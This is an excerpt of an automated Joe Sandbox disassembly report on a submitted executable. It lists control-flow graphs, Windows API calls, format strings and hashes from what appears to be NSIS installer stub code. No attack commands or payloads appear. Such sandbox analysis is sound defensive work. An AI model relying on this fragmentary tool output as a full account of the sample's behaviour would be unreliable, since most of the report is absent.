                                                                                                                                                                                                                                                                                            control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                            • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                            • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                            • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                            • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                            • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                            • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                            • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                            • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                            • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                            • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                            • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                            • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                            • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                                                                                                                            • API String ID: 4286501637-2478300759
                                                                                                                                                                                                                                                                                            • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                            • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
